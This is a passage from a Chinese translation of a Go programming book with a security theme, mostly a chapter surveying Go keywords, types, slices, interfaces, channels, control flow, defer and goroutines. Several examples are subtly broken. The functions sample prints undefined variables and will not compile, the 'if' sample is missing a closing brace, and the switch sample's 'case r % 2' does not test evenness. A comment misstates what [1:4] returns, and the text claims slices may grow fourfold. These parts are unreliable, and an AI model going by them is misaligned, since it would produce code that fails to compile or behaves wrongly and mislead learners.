安装程序类似于构建程序,但是,您运行的是go install而不是go build。您可以在目录中运行它,传递一个绝对目录路径,并传递一个相对于$GOPATH环境变量或直接在文件上的目录路径。一旦程序被安装,它将进入您的$GOBIN,您应该已经设置好了。您还应该将$GOBIN添加到您的$PATH中,这样无论您当前在哪个目录,都可以直接从命令行运行已安装的程序。安装是完全可选的,但对于某些程序来说很方便,特别是您想要保存或经常使用的程序。

总结

阅读完本章后,您应该对 Go 编程语言及其一些关键特性有一个基本的了解。您还应该在您的机器上安装了 Go 的版本,并设置了环境变量。如果您需要更多关于安装和测试您的环境的说明,请参阅 Go 文档golang.org/doc/install

在下一章中,我们将更仔细地了解 Go 编程语言,学习设计、数据类型、关键字、特性、控制结构,以及如何获取帮助和查找文档。如果你已经熟悉 Go,这将是一个很好的复习,以加强你的基础知识。如果你是 Go 的新手,它将作为一个入门指南,为你准备本书的其余部分。

第二章:Go 编程语言

在深入研究使用 Go 进行安全性的更复杂示例之前,建立坚实的基础非常重要。本章概述了 Go 编程语言,以便您具备后续示例所需的知识。

本章不是 Go 编程语言的详尽论述,但将为您提供主要功能的扎实概述。本章的目标是为您提供必要的信息,以便在以前从未使用过 Go 的情况下理解和遵循源代码。如果您已经熟悉 Go,本章应该是对您已经知道的内容的快速简单回顾,但也许您会学到一些新的信息。

本章专门涵盖以下主题:

  • Go 语言规范

  • Go 游乐场

  • Go 之旅

  • 关键字

  • 关于源代码的注释

  • 注释

  • 类型

  • 控制结构

  • 延迟

  • Goroutines

  • 获取帮助和文档

Go 语言规范

整个 Go 语言规范可以在golang.org/ref/spec上找到。本章中的大部分信息来自规范,因为这是语言的真正文档。这里的其他信息是短小的示例、提示、最佳实践和我在使用 Go 期间学到的其他内容。

Go 游乐场

Go 游乐场是一个网站,您可以在其中编写和执行 Go 代码,而无需安装任何东西。在游乐场中,play.golang.org,您可以测试代码片段以探索语言,并尝试理解语言的工作原理。它还允许您通过创建存储代码片段的唯一 URL 来分享您的片段。通过游乐场分享代码可能比纯文本片段更有帮助,因为它允许读者实际执行代码并调整源代码,以便在对其工作原理有任何疑问时进行实验:

上面的截图显示了在游乐场中运行的简单程序。顶部有按钮可以运行、格式化、添加导入语句和与他人共享代码。

Go 之旅

Go 团队提供的另一个资源是Go 之旅。这个网站,tour.golang.org,建立在前一节提到的游乐场之上。这次旅行是我对这种语言的第一次介绍,当我完成它时,我感到有能力开始处理 Go 项目。它会逐步引导您了解语言,并提供工作代码示例,以便您可以运行和修改代码以熟悉语言。这是向新手介绍 Go 的实用方式。如果您根本没有使用过 Go,我鼓励您去看一看。

上面的截图显示了游览的第一页。在右侧,您将看到一个嵌入式的小游乐场,其中包含左侧显示的短课程相关的代码示例。每节课都有一个简短的代码示例,您可以运行和调整。

关键字

为了强调 Go 的简单性,这里列出了其 25 个关键字的详细说明。如果您熟悉其他编程语言,您可能已经了解其中大部分。关键字根据其用途分组在一起进行检查。

数据类型

var 这定义了一个新变量
const 这定义一个不变的常量值
type 这定义了一个新数据类型
struct 这定义了一个包含多个变量的新结构化数据类型
map 这定义了一个新的映射或哈希变量
interface 这定义了一个新接口

函数

func 这定义了一个新函数
return 这退出一个函数,可选地返回值

import 这在当前包中导入外部包
package 这指定文件属于哪个包

程序流

if 如果条件为真,则使用此分支执行
else 如果条件不成立,则使用此分支
goto 这用于直接跳转到标签;它很少使用,也不鼓励使用

Switch 语句

switch 这用于基于条件进行分支
case 这定义了switch语句的条件
default 这定义了当没有匹配的情况时的默认执行
fallthrough 这用于继续执行下一个 case

迭代

for for循环可以像在 C 中一样使用,其中提供三个表达式:初始化程序、条件和增量器。在 Go 中,没有while循环,for关键字承担了forwhile的角色。如果传递一个表达式,条件,for循环可以像while循环一样使用。
range range关键字与for循环一起用于迭代 map 或 slice。
continue continue关键字将跳过当前循环中剩余的任何执行,并直接跳转到下一个迭代。
break break关键字将立即完全退出for循环,跳过任何剩余的迭代。

并发

go Goroutines 是内置到语言中的轻量级线程。您只需在函数调用前面加上go关键字,Go 就会在单独的线程中执行该函数调用。
chan 为了在线程之间通信,使用通道。通道用于发送和接收特定数据类型。它们默认是阻塞的。
select select语句允许通道以非阻塞方式使用。

便利

defer defer关键字是一个相对独特的关键字,在其他语言中我以前没有遇到过。它允许您指定在周围函数返回时稍后调用的函数。当您想要确保当前函数结束时执行某种清理操作,但不确定何时或何地它可能返回时,它非常有用。一个常见的用例是延迟文件关闭。

关于源代码的注释

Go 源代码文件应该有.go扩展名。Go 文件的源代码以 UTF-8 Unicode 编码。这意味着您可以在代码中使用任何 Unicode 字符,比如在字符串中硬编码日语字符。

分号在行尾是可选的,通常省略。只有在分隔单行上的多个语句或表达式时才需要分号。

Go 确实有一个代码格式化标准,可以通过在源代码文件上运行go fmt来轻松遵守。应该遵循代码格式化,但不像 Python 那样严格由编译器执行确切的格式化以正确执行。

注释

注释遵循 C++风格,允许双斜杠和斜杠星号包装样式:

// Line comment, everything after slashes ignored
/* General comment, can be in middle of line or span multiple lines */

类型

内置数据类型的命名相当直观。Go 带有一组具有不同位长度的整数和无符号整数类型。还有浮点数、布尔值和字符串,这应该不足为奇。

有一些类型,如符文,在其他语言中不常见。本节涵盖了所有不同的类型。

布尔

布尔类型表示真或假值。有些语言不提供bool类型,您必须使用整数或定义自己的枚举,但 Go 方便地预先声明了bool类型。truefalse常量也是预定义的,并且以全小写形式使用。以下是创建布尔值的示例:

var customFlag bool = false  

bool类型并不是 Go 独有的,但关于布尔类型的一个有趣的小知识是,它是唯一以一个人命名的类型。乔治·布尔生于 1815 年,逝世于 1864 年,写了《思维的法则》,在其中描述了布尔代数,这是所有数字逻辑的基础。bool类型在 Go 中非常简单,但其名称背后的历史非常丰富。

数字

主要的数字数据类型是整数和浮点数。Go 还提供了复数类型、字节类型和符文。以下是 Go 中可用的数字数据类型。

通用数字

这些通用类型可以在您不特别关心数字是 32 位还是 64 位时使用。将自动使用最大可用大小,但将与 32 位和 64 位处理器兼容。

  • uint:这是一个 32 位或 64 位的无符号整数

  • int:这是一个带有与uint相同大小的有符号整数

  • uintptr:这是一个无符号整数,用于存储指针值

特定数字

这些数字类型指定了位长度以及它是否具有符号位来确定正负值。位长度将确定最大范围。有符号整数的范围会减少一个位,因为最后一位保留给了符号。

无符号整数

在没有数字的情况下使用uint通常会选择系统的最大大小,通常为 64 位。您还可以指定这四种特定的uint大小之一:

  • uint8:无符号 8 位整数(0 至 255)

  • uint16:无符号 16 位整数(0 至 65535)

  • uint32:无符号 32 位整数(0 至 4294967295)

  • uint64:无符号 64 位整数(0 至 18446744073709551615)

有符号整数

与无符号整数一样,您可以单独使用int来选择最佳默认大小,或者指定这四种特定的int大小之一:

  • int8:8 位整数(-128 至 127)

  • int16:16 位整数(-32768 至 32767)

  • int32:32 位整数(-2147483648 至 2147483647)

  • int64:64 位整数(-9223372036854775808 至 9223372036854775807)

浮点数

浮点类型没有通用类型,必须是以下两种选项之一:

  • float32:IEEE-754 32 位浮点数

  • float64:IEEE-754 64 位浮点数

其他数字类型

Go 还为高级数学应用提供了复数类型,以及一些别名以方便使用:

  • complex64:具有float32实部和虚部的复数

  • complex128:具有float64实部和虚部的复数

  • byteuint8的别名

  • runeint32的别名

您可以以十进制、八进制或十六进制格式定义数字。十进制或十进制数字不需要前缀。八进制或八进制数字应以零为前缀。十六进制或十六进制数字应以零和 x 为前缀。

您可以在en.wikipedia.org/wiki/Octal上了解更多八进制数字系统,十进制数字在en.wikipedia.org/wiki/Decimal,十六进制数字在en.wikipedia.org/wiki/Hexadecimal

请注意,数字被存储为整数,它们之间没有区别,除了它们在源代码中的格式化方式。在处理二进制数据时,八进制和十六进制可能很有用。以下是如何定义整数的简短示例:

package main

import "fmt"

func main() {
   // Decimal for 15
   number0 := 15

   // Octal for 15
   number1 := 017 

   // Hexadecimal for 15
   number2 := 0x0F

   fmt.Println(number0, number1, number2)
} 

字符串

Go 还提供了string类型以及一个strings包,其中包含一套有用的函数,如Contains()Join()Replace()Split()Trim()ToUpper()。此外还有一个专门用于将各种数据类型转换为字符串的strconv包。您可以在golang.org/pkg/strings/上阅读有关strings包的更多信息,以及在golang.org/pkg/strconv/上阅读有关strconv包的更多信息。

双引号用于字符串。单引号仅用于单个字符或符文,而不是字符串。可以使用长形式或使用声明和分配运算符的短形式来定义字符串。您还可以使用`(反引号)符号,用于封装跨多行的字符串。以下是字符串用法的简短示例:


package main
import "fmt"
func main() {
   // 长形式分配
   var myText = "test string 1"
   // 短形式分配
   myText2 := "test string 2"
   // 多行字符串
   myText3 := `long string
   spans multiple
   lines`
   fmt.Println(myText)
   fmt.Println(myText2)
   fmt.Println(myText3)
}

数组

数组由特定类型的序列化元素组成。可以为任何数据类型创建一个数组。数组的长度是不可变的,必须在声明时指定。数组很少直接使用,而是在下一节中介绍的切片类型中大多数使用。数组始终是一维的,但可以创建一个数组的数组来创建多维对象。

要创建一个包含128个字节的数组,可以使用以下语法:


var myByteArray [128]byte

数组的各个元素可以通过基于0的数字索引进行访问。例如,要获取字节数组的第五个元素,语法如下:


singleByte := myByteArray[4]

切片

切片使用数组作为基础数据类型。主要优点是切片可以调整大小,而数组不行。将切片视为对基础数组的查看窗口。容量指的是基础数组的大小,以及切片的最大可能长度。切片的长度指当前长度,可以调整大小。

使用make()函数创建切片。make()函数将创建指定类型、长度和容量的切片。在创建切片时,make()函数可以有两种方式。只有两个参数时,长度和容量相同。有三个参数时,可以指定一个比长度大的最大容量。以下是两种make()函数声明:


make([]T, lengthAndCapacity)
make([]T, length, capacity)

可以创建具有容量和长度为0nil切片。nil切片没有关联的基础数组。以下是演示如何创建和检查切片的简短示例程序:


package main
import "fmt"
func main() {
   // 创建一个 nil 切片
   var mySlice []byte
   // 创建长度为 8,最大容量为 128 的字节切片
   mySlice = make([]byte, 8, 128)
   // 切片的最大容量
   fmt.Println("Capacity:", cap(mySlice))
   // 切片的当前长度
   fmt.Println("Length:", len(mySlice))
}

也可以使用内置append()函数向切片追加元素。

Append可以一次添加一个或多个元素。必要时,基础数组将调整大小。这意味着切片的最大容量可以增加。当一个切片增加其基础容量时,创建一个更大的基础数组时,将创建具有一些额外空间的数组。这意味着如果超过一个切片的容量,可能会将数组大小增加四倍。这样做是为了使基础数组有空间增长,以减少重新调整大小基础数组的次数,这可能需要移动内存以容纳更大的数组。每次只需添加一个元素就重新调整大小数组可能会很昂贵。切片机制将自动确定最佳的调整大小。

以下代码示例提供了使用切片的各种示例:


package main
import "fmt"
func main() {
   var mySlice []int // nil slice
   // 在 nil 切片上可以使用附加功能。
   // 由于 nil 切片的容量为零,并且具有
   // 没有基础数组,它将创建一个。
   mySlice = append(mySlice, 1, 2, 3, 4, 5)
   // 可以从切片中访问单个元素
   // 就像使用方括号运算符一样,就像数组一样。
   firstElement := mySlice[0]
   fmt.Println("First element:", firstElement)
   // 仅获取第二个和第三个元素,请使用:
   subset := mySlice[1:4]
   fmt.Println(subset)
   // 要获取切片的全部内容,除了
   // 第一个元素,使用:
   subset = mySlice[1:]
   fmt.Println(subset)
   // 要获取切片的全部内容,除了
   // 最后一个元素,使用:
   subset = mySlice[0 : len(mySlice)-1]
   fmt.Println(subset)
   // 要复制切片,请使用 copy()函数。
   // 如果您使用等号将一个切片分配给另一个切片,
   // 切片将指向相同的内存位置,
   // 更改一个会更改两个切片。
   slice1 := []int{1, 2, 3, 4}
   slice2 := make([]int, 4)
   // 在内存中创建一个唯一的副本
   copy(slice2, slice1)
   // 更改一个不应影响另一个
   slice2[3] = 99
   fmt.Println(slice1)
   fmt.Println(slice2)
}

结构体

在 Go 中,结构体或数据结构是一组变量。变量可以是不同类型的。我们将看一个创建自定义结构体类型的示例。

Go 使用基于大小写的作用域来声明变量为publicprivate。大写的变量和方法是公开的,可以从其他包中访问。小写的值是私有的,只能在同一包中访问。

以下示例创建了一个名为Person的简单结构体,以及一个名为Hacker的结构体。Hacker类型在其中嵌入了一个Person类型。然后分别创建了每种类型的实例,并将有关它们的信息打印到标准输出:


package main
import "fmt"
func main() {
   // 定义一个 Person 类型。两个字段都是公共的
   type Person struct {
      Name string
      Age  int
   }
   // 创建一个 Person 对象并存储指向它的指针
   nanodano := &Person{Name: "NanoDano", Age: 99}
   fmt.Println(nanodano)
   // 结构也可以嵌入在其他结构中。
   // 这通过简单地存储
   // 另一个变量作为数据类型。
   type Hacker struct {
      Person           Person
      FavoriteLanguage string
   }
   fmt.Println(nanodano)
   hacker := &Hacker{
      Person:           *nanodano,
      FavoriteLanguage: "Go",
   }
   fmt.Println(hacker)
   fmt.Println(hacker.Person.Name)
   fmt.Println(hacker)
}

你可以通过将它们的名称以小写字母开头来创建私有变量。我用引号是因为私有变量与其他语言中的工作方式略有不同。隐私工作在包级别而不是或类型级别。

指针

Go 提供了一个指针类型,用于存储特定类型数据的内存位置。指针可以被用来通过引用传递一个结构体给函数,而不需要创建副本。这也允许函数就地修改对象。

Go 不允许指针算术。指针被认为是安全的,因为 Go 甚至不定义指针类型上的加法运算符。它们只能用于引用现有对象。

这个示例演示了基本的指针用法。它首先创建一个整数,然后创建一个指向该整数的指针。然后打印指针的数据类型,指针中存储的地址,以及被指向的数据的值:


package main
import (
   "fmt"
   "reflect"
)
func main() {
   myInt := 42
   intPointer := &myInt
   fmt.Println(reflect.TypeOf(intPointer))
   fmt.Println(intPointer)
   fmt.Println(*intPointer)
}

函数

使用func关键字定义函数。函数可以有多个参数。所有参数都是位置参数,没有命名参数。Go 支持可变参数,允许有未知数量的参数。在 Go 中,函数是一等公民,并且可以匿名使用并作为变量返回。Go 还支持从函数返回多个值。下划线可以用于忽略返回变量。

所有这些示例都在以下代码来源中演示:


package main
import "fmt"
// 没有参数的函数
func sayHello() {
   fmt.Println("Hello.")
}
// 带有一个参数的函数
func greet(name string) {
   fmt.Printf("Hello, %s.\n", name)
}
// 具有相同类型的多个参数的函数
func greetCustom(name, greeting string) {
   fmt.Printf("%s, %s.\n", greeting, name)
}
// 变参参数,无限参数
func addAll(numbers ...int) int {
   sum := 0
   for _, number := range numbers {
      sum += number
   }
   return sum
}
// 具有多个返回值的函数
// 由括号封装的多个值
func checkStatus() (int, error) {
   return 200, nil
}
// 将类型定义为函数,以便可以使用
// 作为返回类型
type greeterFunc func(string)
// 生成并返回一个函数
func generateGreetFunc(greeting string) greeterFunc {
   return func(name string) {
      fmt.Printf("%s, %s.\n", greeting, name)
   }
}
func main() {
   sayHello()
   greet("NanoDano")
   greetCustom("NanoDano", "Hi")
   fmt.Println(addAll(4, 5, 2, 3, 9))
   russianGreet := generateGreetFunc("Привет")
   russianGreet("NanoDano")
   var stringToIntMap map[string]int
   fmt.Println(statusCode, err)
}

接口

接口是一种特殊类型,它定义了一系列函数签名。你可以把接口看作是在说,“一个类型必须实现函数 X 和函数 Y 来满足这个接口。” 如果你创建了任何类型并实现了满足接口所需的函数,那么你的类型可以在期望接口的任何地方使用。你不必指定你正在尝试满足一个接口,编译器将确定它是否满足要求。

你可以为你的自定义类型添加任意多的其他函数。接口定义了所需的函数,但这并不意味着你的类型仅限于实现这些函数。

最常用的接口是error接口。error接口只需要实现一个函数,即一个名为Error()的函数,该函数返回一个带有错误消息的字符串。以下是接口定义:

type error interface {
   Error() string
} 

这使得你很容易实现自己的错误接口。这个示例创建了一个customError类型,然后实现了满足接口所需的Error()函数。然后,创建了一个示例函数,该函数返回自定义错误:


package main

import "fmt"

// Define a custom type that will
// be used to satisfy the error interface
type customError struct {
   Message string
}

// Satisfy the error interface
// by implementing the Error() function
// which returns a string
func (e *customError) Error() string {
   return e.Message
}

// Sample function to demonstrate
// how to use the custom error
func testFunction() error {
   if true != false { // Mimic an error condition
      return &customError{"Something went wrong."}
   }
   return nil
}

func main() {
   err := testFunction()
   if err != nil {
      fmt.Println(err)
   }
} 

其他经常使用的接口是 ReaderWriter 接口。每个接口只需要实现一个函数以满足接口要求。这里的一个重大好处是你可以创建自己的自定义类型,以某种任意的方式读取和写入数据。接口不关心实现细节。接口不会在乎你是在读写硬盘、网络连接、内存中的存储还是 /dev/null。只要你实现了所需的函数签名,你就可以在任何使用接口的地方使用你的类型。下面是 ReaderWriter 接口的定义:


type Reader interface {
   Read(p []byte) (n int, err error)
} 
 
type Writer interface {
   Write(p []byte) (n int, err error)
} 

Map

Map 是一个存储键值对的哈希表或字典。键和值可以是任何数据类型,包括映射本身,从而创建多个维度。

顺序不受保证。你可以多次迭代一个映射,并且可能会不同。此外,映射不是并发安全的。如果必须在线程之间共享映射,请使用互斥锁。

这里是一些示例映射用法:


package main

import (
   "fmt"
   "reflect"
)

func main() {
   // Nil maps will cause runtime panic if used 
   // without being initialized with make()
   var intToStringMap map[int]string
   var stringToIntMap map[string]int
   fmt.Println(reflect.TypeOf(intToStringMap))
   fmt.Println(reflect.TypeOf(stringToIntMap))

   // Initialize a map using make
   map1 := make(map[string]string)
   map1["Key Example"] = "Value Example"
   map1["Red"] = "FF0000"
   fmt.Println(map1)

   // Initialize a map with literal values
   map2 := map[int]bool{
      4:  false,
      6:  false,
      42: true,
   }

   // Access individual elements using the key
   fmt.Println(map1["Red"])
   fmt.Println(map2[42])
   // Use range to iterate through maps
   for key, value := range map2 {
      fmt.Printf("%d: %t\n", key, value)
   }

} 

Channel

通道用于线程之间通信。通道是先进先出FIFO)队列。你可以将对象推送到队列并异步从前端拉取。每个通道只能支持一个数据类型。通道默认是阻塞的,但可以通过 select 语句使其成为非阻塞。像切片和映射一样,通道必须在使用之前用 make() 函数初始化。

在 Go 中的格言是 不要通过共享内存来通信;而是通过通信来共享内存。在blog.golang.org/share-memory-by-communicating上阅读更多关于这一哲学的内容。

下面是一个演示基本通道使用的示例程序:


package main

import (
   "log"
   "time"
)

// Do some processing that takes a long time
// in a separate thread and signal when done
func process(doneChannel chan bool) {
   time.Sleep(time.Second * 3)
   doneChannel <- true
}

func main() {
   // Each channel can support one data type.
   // Can also use custom types
   var doneChannel chan bool

   // Channels are nil until initialized with make
   doneChannel = make(chan bool)

   // Kick off a lengthy process that will
   // signal when complete
   go process(doneChannel)

   // Get the first bool available in the channel
   // This is a blocking operation so execution
   // will not progress until value is received
   tempBool := <-doneChannel
   log.Println(tempBool)
   // or to simply ignore the value but still wait
   // <-doneChannel

   // Start another process thread to run in background
   // and signal when done
   go process(doneChannel)

   // Make channel non-blocking with select statement
   // This gives you the ability to continue executing
   // even if no message is waiting in the channel
   var readyToExit = false
   for !readyToExit {
      select {
      case done := <-doneChannel:
         log.Println("Done message received.", done)
         readyToExit = true
      default:
         log.Println("No done signal yet. Waiting.")
         time.Sleep(time.Millisecond * 500)
      }
   }
} 

控制结构

控制结构用于控制程序执行的流程。最常见的形式是 if 语句、for 循环和 switch 语句。Go 也支持 goto 语句,但应保留用于极端性能情况,不应经常使用。让我们简要地看一下这些以了解语法。

if

if 语句有 ifelse ifelse 子句,就像大多数其他语言一样。 Go 的一个有趣特性是能够在条件之前放置语句,创建在 if 语句完成后被丢弃的临时变量。

这个示例演示了使用 if 语句的各种方式:


package main

import (
   "fmt"
   "math/rand"
)

func main() {
   x := rand.Int()

   if x < 100 {
      fmt.Println("x is less than 100.")
   }

   if x < 1000 {
      fmt.Println("x is less than 1000.")
   } else if x < 10000 {
      fmt.Println("x is less than 10,000.")
   } else {
      fmt.Println("x is greater than 10,000")
   }

   fmt.Println("x:", x)

   // You can put a statement before the condition 
   // The variable scope of n is limited
   if n := rand.Int(); n > 1000 {
      fmt.Println("n is greater than 1000.")
      fmt.Println("n:", n)
   } else {
      fmt.Println("n is not greater than 1000.")
      fmt.Println("n:", n)
   }
   // n is no longer available past the if statement

for

for 循环有三个组件,可以像在 C 或 Java 中一样使用 for 循环。Go 没有 while 循环,因为当与单个条件一起使用时,for 循环起到相同的作用。请参考以下示例以获得更多的清晰度:


package main

import (
   "fmt"
)

func main() {
   // Basic for loop
   for i := 0; i < 3; i++ {
      fmt.Println("i:", i)
   }

   // For used as a while loop
   n := 5
   for n < 10 {
      fmt.Println(n)
      n++
   }
} 

range

range关键字用于遍历切片、映射或其他数据结构。range关键字与for循环结合使用,对可迭代的数据结构进行操作。range关键字返回键和值变量。以下是使用range关键字的一些基本示例:


package main

import "fmt"

func main() {
   intSlice := []int{2, 4, 6, 8}
   for key, value := range intSlice {
      fmt.Println(key, value)
   }

   myMap := map[string]string{
      "d": "Donut",
      "o": "Operator",
   }

   // Iterate over a map
   for key, value := range myMap {
      fmt.Println(key, value)
   }

   // Iterate but only utilize keys
   for key := range myMap {
      fmt.Println(key)
   }

   // Use underscore to ignore keys
   for _, value := range myMap {
      fmt.Println(value)
   }
} 

switch、case、fallthrough 和 default

switch语句允许您根据变量的状态分支执行。它类似于 C 和其他语言中的switch语句。

默认情况下没有fallthrough。这意味着一旦到达一个情况的末尾,代码就会完全退出switch语句,除非提供了显式的fallthrough命令。如果没有匹配到任何情况,则可以提供一个default情况。

您可以在要切换的变量前放置一个语句,例如if语句。这会创建一个作用域限于switch语句的变量。

此示例演示了两个switch语句。第一个使用硬编码的值,并包含一个default情况。第二个switch语句使用了一种允许在第一行中包含语句的替代语法:


package main

import (
   "fmt"
   "math/rand"
)

func main() {
   x := 42

   switch x {
   case 25:
      fmt.Println("X is 25")
   case 42:
      fmt.Println("X is the magical 42")
      // Fallthrough will continue to next case
      fallthrough
   case 100:
      fmt.Println("X is 100")
   case 1000:
      fmt.Println("X is 1000")
   default:
      fmt.Println("X is something else.")
   }

   // Like the if statement a statement
   // can be put in front of the switched variable
   switch r := rand.Int(); r {
   case r % 2:
      fmt.Println("Random number r is even.")
   default:
      fmt.Println("Random number r is odd.")
   }
   // r is no longer available after the switch statement
} 

跳转

Go 语言确实有goto语句,但很少使用。使用一个名称和一个冒号创建一个标签,然后使用goto关键字跳转到它。这是一个基本示例:


package main

import "fmt"

func main() {

   goto customLabel

   // Will never get executed because
   // the goto statement will jump right
   // past this line
   fmt.Println("Hello")

   customLabel:
   fmt.Println("World")
} 

延迟

通过延迟一个函数,它会在当前函数退出时运行。这是一种方便的方式,可以确保一个函数在退出之前被执行,这对于清理或关闭文件很有用。这很方便,因为一个延迟的函数会在周围函数的任何退出处被执行,如果有多个返回位置的话。

常见用例是延迟调用关闭文件或数据库连接。在打开文件后,您可以延迟调用关闭。这将确保文件在函数退出时关闭,即使有多个返回语句,您也不能确定当前函数何时何地退出。

此示例演示了defer关键字的一个简单用例。它创建一个文件,然后延迟调用file.Close()


package main

import (
   "log"
   "os"
)

func main() {

   file, err := os.Create("test.txt")
   if err != nil {
      log.Fatal("Error creating file.")
   }
   defer file.Close()
   // It is important to defer after checking the errors.
   // You can't call Close() on a nil object
   // if the open failed.

   // ...perform some other actions here...

   // file.Close() will be called before final exit
} 

一定要正确检查和处理错误。如果使用空指针,则defer调用会导致恐慌。

还要明白延迟函数是在周围函数退出时运行的。如果在for循环中放置一个defer调用,它将不会在每个for循环迭代结束时被调用。

包只是目录。每个目录都是一个包。创建子目录会创建一个新包。没有子包会导致一个平坦的层次结构。子目录仅用于组织代码。

包应该存储在您的$GOPATH变量的src文件夹中。

包名应该与文件夹名匹配,或者命名为main。一个main包意味着它不打算被导入到另一个应用程序中,而是打算编译并作为程序运行。使用import关键字导入包。

你可以单独导入包:


import "fmt"

或者,你可以通过用括号包裹多个包来一次性导入多个包:


import (
   "fmt"
   "log"
) 

从技术上讲,Go 并没有类,但有几个微妙的区别使其不被称为面向对象的语言。概念上,我认为它是一种面向对象的编程语言,尽管仅支持最基本的面向对象语言特性。它不具备许多人们对面向对象编程所熟悉的所有特性,比如继承和多态性,而是用其他特性如嵌入类型和接口来替代。也许你可以把它称为一个微类系统,因为它是一个最简化实现,没有额外的特性或负担,这取决于你的角度。

本书中,术语对象可能会被用来说明一个概念,使用熟悉的术语,但请注意这些在 Go 中并不是正式术语。类型定义与操作该类型的函数结合起来类似于类,而对象是类型的一个实例。

继承

Go 中没有继承,但可以嵌入类型。这里有一个PersonDoctor类型的示例,Doctor类型嵌入了Person类型。与直接继承Person的行为不同,它将Person对象作为变量存储,从而带来了其预期的Person方法和属性:


package main

import (
   "fmt"
   "reflect"
)

type Person struct {
   Name string
   Age  int
} 

type Doctor struct {
   Person         Person
   Specialization string
}

func main() {
   nanodano := Person{
      Name: "NanoDano",
      Age:  99,
   } 

   drDano := Doctor{
      Person:         nanodano,
      Specialization: "Hacking",
   }

   fmt.Println(reflect.TypeOf(nanodano))
   fmt.Println(nanodano)
   fmt.Println(reflect.TypeOf(drDano))
   fmt.Println(drDano)
} 

多态性

Go 中没有多态性,但可以使用接口创建可以被多个类型使用的通用抽象。接口定义了一个或多个必须满足以兼容接口的方法声明。接口在本章的前面已经介绍过。

构造函数

Go 中没有构造函数,但有类似于初始化对象的工厂函数New()。你只需创建一个名为New()的函数,返回你的数据类型。下面是一个示例:


package main

import "fmt"

type Person struct {
   Name string
}

func NewPerson() Person {
   return Person{
      Name: "Anonymous",
   }
}

func main() {
   p := NewPerson()
   fmt.Println(p)
} 

Go 中没有析构函数,因为一切都是由垃圾回收来处理,你不需要手动销毁对象。通过延迟(defer)一个函数调用来在当前函数结束时执行一些清理操作是最接近的方法。

方法

方法是属于特定类型的函数,使用点标记法来调用,例如:


myObject.myMethod()

点符号标记在 C++和其他面向对象的语言中被广泛使用。 点符号标记和类系统源自于在 C 中使用的一个常见模式。 这个常见模式是定义一组函数,所有这些函数都操作一个特定的数据类型。 所有相关的函数都有相同的第一个参数,即要操作的数据。 由于这是一个如此常见的模式,Go 将其内置到语言中。 在 Go 函数定义中,不是将要操作的对象作为第一个参数传递,而是有一个特殊的位置来指定接收器。 接收器在函数名称之前的一对括号之间指定。 下一个示例演示了如何使用函数接收器。

与其编写一组大型函数,所有这些函数都将指针作为它们的第一个参数,不如编写具有特殊接收器的函数。 接收器可以是类型或类型的指针:

package main

import "fmt"

type Person struct {
   Name string
}

// Person function receiver
func (p Person) PrintInfo() {
   fmt.Printf("Name: %s\n", p.Name)
}

// Person pointer receiver
// If you did not use the pointer receivers
// it would not modify the person object
// Try removing the asterisk here and seeing how the
// program changes behavior
func (p *Person) ChangeName(newName string) {
   p.Name = newName
}

func main() {
   nanodano := Person{Name: "NanoDano"}
   nanodano.PrintInfo()
   nanodano.ChangeName("Just Dano")
   nanodano.PrintInfo()
} 

在 Go 中,您不会将所有变量和方法封装在一个整体的大括号对中。 您定义一个类型,然后定义操作该类型的方法。 这使您可以在一个地方定义所有的结构体和数据类型,并在包的其他地方定义方法。 您还可以选择在一起定义类型和方法。 这非常简单直接,创建了状态(数据)和逻辑之间稍微清晰的区别。

运算符重载

Go 中没有运算符重载,因此您不能使用+号将两个结构体相加,但是您可以轻松地在类型上定义一个Add()函数,然后调用类似dataSet1.Add(dataSet2)的函数。 通过将语言中的操作符重载省略掉,我们可以放心地使用这些操作符,而不必担心由于在代码中的其他地方重载操作符行为而导致的意外行为。

Goroutines

Goroutines 是内置到语言中的轻量级线程。 您只需在函数调用前加上go这个词,就可以让函数在一个线程中执行。 本书中还可以将 goroutines 称为线程。

Go 确实提供了互斥锁,但在大多数情况下可以避免使用,并且本书不会涵盖它们。 您可以在golang.org/pkg/sync/上阅读有关互斥锁的更多信息。 通道应该用于在线程之间共享数据和通信。 本章前面已经介绍了通道。

注意,log包是可以并发安全使用的,但fmt包不是。 下面是使用 goroutines 的简短示例:


package main

import (
   "log"
   "time"
)

func countDown() {
   for i := 5; i >= 0; i-- {
      log.Println(i)
      time.Sleep(time.Millisecond * 500)
   }
}

func main() {
   // Kick off a thread
   go countDown()

   // Since functions are first-class
   // you can write an anonymous function
   // for a goroutine
   go func() {
      time.Sleep(time.Second * 2)
      log.Println("Delayed greetings!")
   }()

   // Use channels to signal when complete
   // Or in this case just wait
   time.Sleep(time.Second * 4)
} 

获取帮助和文档

Go 同时具有在线和离线帮助文档。 离线文档是 Go 内置的,与在线托管的文档相同。 接下来的几节将引导您访问这两种形式的文档。

在线 Go 文档

在线文档可在golang.org/ 上找到,其中包含所有正式文档、规范和帮助文件。语言文档专门位于golang.org/doc/,标准库信息位于golang.org/pkg/

离线 Go 文档

Go 还附带了离线文档,使用godoc命令行工具即可。您可以在命令行上使用它,或者让它运行一个 Web 服务器,在其中提供与golang.org/ 相同的网站。将完整的网站文档本地可用是非常方便的。以下是几个示例,用于获取fmt包的文档。将fmt替换为您感兴趣的任何包:


# 获取 fmt 包信息
godoc fmt
# 获取 fmt 包的源代码
godoc -src fmt
# 获取特定函数信息
godoc fmt Printf
# 获取函数的源代码
godoc -src fmt Printf
# 运行 HTTP 服务器以查看 HTML 文档
godoc -http = localhost:9999

HTTP 选项提供与golang.org/上可用的相同文档。

摘要

阅读完本章后,您应该对 Go 基础有基本的了解,例如关键字是什么,它们的作用是什么,以及有哪些基本数据类型可用。您还应该可以轻松创建函数和自定义数据类型。

目标不是记住所有先前的信息,而是了解语言中提供了哪些工具。如有必要,使用本章作为参考。您可以在golang.org/ref/spec找到有关 Go 语言规范的更多信息。

在下一章中,我们将讨论在 Go 中处理文件的工作。我们将涵盖基础知识,如获取文件信息,查看文件是否存在,截断文件,检查权限以及创建新文件。我们还将涵盖读取器和写入器接口,以及多种读取和写入数据的方法。除此之外,我们还将涵盖诸如打包到 ZIP 或 TAR 文件以及使用 GZIP 压缩文件等内容。

第三章:处理文件

Unix 和 Linux 系统的一个显著特点是将所有内容都视为文件。进程、文件、目录、套接字、设备和管道都被视为文件。鉴于操作系统的这一基本特性,学习如何操作文件是一项关键技能。本章提供了几个不同方式操作文件的示例。

首先,我们将看一下基础知识,即创建、截断、删除、打开、关闭、重命名和移动文件。我们还将看一下如何获取有关文件的详细属性,例如权限和所有权、大小和符号链接信息。

